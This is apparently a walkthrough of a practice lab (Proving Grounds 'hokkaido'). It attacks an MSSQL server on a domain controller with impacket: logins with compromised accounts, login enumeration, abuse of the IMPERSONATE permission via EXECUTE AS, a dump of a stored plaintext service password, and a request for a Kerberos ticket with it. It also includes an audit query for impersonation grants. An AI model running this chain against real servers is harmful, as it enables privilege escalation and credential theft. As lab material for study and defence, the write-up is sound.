MSSQL


Nmap discovered an MSSQL service on target ports 1433 and 58538. The running service is Microsoft SQL Server 2019 15.00.2000.00.

info Session


The info account has been compromised. Attempting to access the target MSSQL instance.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-mssqlclient HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -target-ip $IP -debug      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: info@dc.hokkaido-aerospace.com.ccache
[+] SPN MSSQLSVC/DC.HOKKAIDO-AEROSPACE.COM:1433@HOKKAIDO-AEROSPACE.COM not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/HOKKAIDO-AEROSPACE.COM@HOKKAIDO-AEROSPACE.COM
[+] Using TGT from cache
[+] Username retrieved from CCache: info
[+] Searching target's instances to look for port number 1433
[+] Trying to connect to KDC at 192.168.119.40:88
[+] Server time (UTC): 2025-04-25 15:00:08
[+] Exception:
[...REDACTED...]
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)

Kerberos authentication through pass-the-ticket with the TGT of the compromised info account fails with KDC_ERR_S_PRINCIPAL_UNKNOWN, possibly because the required SPN, MSSQLSVC/DC.HOKKAIDO-AEROSPACE.COM:1433@HOKKAIDO-AEROSPACE.COM, is not known to the KDC, so no service ticket for it can be obtained.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-mssqlclient HOKKAIDO-AEROSPACE.COM/info:info@dc.hokkaido-aerospace.com -target-ip $IP -windows-auth -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (HAERO\info  guest@master)> 

However, NTLM authentication with the -windows-auth flag works; authenticated as guest.

SQL (HAERO\info  guest@master)> SELECT name from master..sysdatabases;
name
-------   
master
tempdb
model
msdb
hrappdb
 
 
SQL (HAERO\info  guest@tempdb)> use hrappdb;
ERROR(DC\SQLEXPRESS): Line 1: The server principal "HAERO\info" is not able to access the database "hrappdb" under the current security context.

There is a non-default database, hrappdb, but the info account cannot access it.

discovery Session


The discovery account has been compromised. Attempting to access the target MSSQL instance.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=discovery@dc.hokkaido-aerospace.com.ccache impacket-mssqlclient HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -target-ip $IP -debug 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: discovery@dc.hokkaido-aerospace.com.ccache
[+] SPN MSSQLSVC/DC.HOKKAIDO-AEROSPACE.COM:1433@HOKKAIDO-AEROSPACE.COM not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/HOKKAIDO-AEROSPACE.COM@HOKKAIDO-AEROSPACE.COM
[+] Using TGT from cache
[+] Username retrieved from CCache: discovery
[+] Searching target's instances to look for port number 1433
[+] Trying to connect to KDC at 192.168.119.40:88
[+] Server time (UTC): 2025-04-25 15:10:14
[+] Exception:
[...REDACTED...]
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)

Again, Kerberos authentication through pass-the-ticket with the TGT of the compromised discovery account fails.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-mssqlclient 'HOKKAIDO-AEROSPACE.COM/discovery:Start123!@dc.hokkaido-aerospace.com' -target-ip $IP -windows-auth -debug 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (HAERO\discovery  guest@master)> 

Yet NTLM authentication with the -windows-auth flag works; authenticated as guest.

Not Authorized


SQL (HAERO\discovery  guest@master)> use hrappdb;
ERROR(DC\SQLEXPRESS): Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.

The hrappdb DB still cannot be accessed by the compromised discovery account

SQL (HAERO\discovery  guest@master)> SELECT name from master..syslogins
name             
--------------   
sa
BUILTIN\Users
hrappdb-reader
HAERO\services
 
SQL (HAERO\discovery  guest@master)> select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
login            login_type   password_hash   create_date   modify_date   status     
--------------   ----------   -------------   -----------   -----------   --------   
hrappdb-reader   SQL_LOGIN             NULL   2023-11-25 06:05:50   2023-11-25 06:05:50   b'Enabled'   
 
sa               SQL_LOGIN             NULL   2003-04-08 09:10:35   2023-11-25 05:47:06   b'Disabled'

Checking the list of logins reveals one that appears to be relevant to the forbidden hrappdb database: hrappdb-reader.

Impersonation


In MSSQL, the IMPERSONATE permission allows a login or user with the appropriate grant to assume the identity and permissions of another login or user. Attackers can abuse this post-compromise to move laterally within the database server or to escalate privileges, typically by issuing EXECUTE AS statements to take on a higher-privileged identity. Privilege enumeration should therefore include checking IMPERSONATE permissions via SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

SQL (HAERO\discovery  guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
--------------   
hrappdb-reader

Checking for impersonation reveals that the current user, discovery, is able to impersonate the hrappdb-reader login.

SQL (HAERO\discovery  guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader  guest@master)> 

Successfully assumed the identity of the hrappdb-reader login via impersonation.
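The one-column query above only lists logins that can be impersonated, not who holds the grant. As an added audit query (not part of this write-up), the following T-SQL resolves every explicit server-level IMPERSONATE grant into grantee and target, and flags targets that are sysadmin, which is what a defender reviewing an instance like DC\SQLEXPRESS would want to see; the grantee names it returns in this environment are not shown on the page and are not assumed here.

```sql
-- Added audit query (not from the original write-up).
-- sys.server_permissions rows with class 101 (SERVER_PRINCIPAL) and
-- permission_name IMPERSONATE describe "grantee may impersonate target".
-- major_id is the principal_id of the login being impersonated;
-- grantee_principal_id is the login that received the permission.
SELECT
    grantee.name                                AS grantee_login,
    grantee.type_desc                           AS grantee_type,
    target.name                                 AS impersonated_login,
    target.type_desc                            AS impersonated_type,
    target.is_disabled                          AS impersonated_disabled,
    -- 1 if impersonating the target yields sysadmin (full instance takeover)
    IS_SRVROLEMEMBER('sysadmin', target.name)   AS impersonated_is_sysadmin,
    perm.state_desc                             AS grant_state
FROM sys.server_permissions AS perm
JOIN sys.server_principals  AS grantee
    ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.server_principals  AS target
    ON target.principal_id  = perm.major_id
WHERE perm.class_desc       = 'SERVER_PRINCIPAL'
  AND perm.permission_name  = 'IMPERSONATE'
  AND perm.state IN ('G', 'W')      -- GRANT or GRANT WITH GRANT OPTION
ORDER BY grantee.name, target.name;
```

Grants to BUILTIN\Users or public are worth special attention, since every Windows-authenticated guest connection (such as HAERO\discovery above) inherits them. Database-scoped impersonation is recorded separately in sys.database_permissions (class 4, DATABASE_PRINCIPAL) and must be audited per database.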

hrappdb-reader Session


SQL (hrappdb-reader  guest@master)> use hrappdb;
ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> 

Switched to the hrappdb DB.

hrappdb DB

SQL (hrappdb-reader  hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
hrappdb         dbo            sysauth      b'BASE TABLE'

The hrappdb DB has a single table, sysauth.

SQL (hrappdb-reader  hrappdb-reader@hrappdb)> SELECT * FROM hrappdb..sysauth;
id   name               password           
--   ----------------   ----------------   
 0   b'hrapp-service'   b'Untimed$Runny'

The sysauth table contains the credential of the hrapp-service account: Untimed$Runny

Validation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/hrapp-service@dc.hokkaido-aerospace.com -dc-ip $IP   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Untimed$Runny
[*] Saving ticket in hrapp-service@dc.hokkaido-aerospace.com.ccache

Validated TGT generated for the hrapp-service account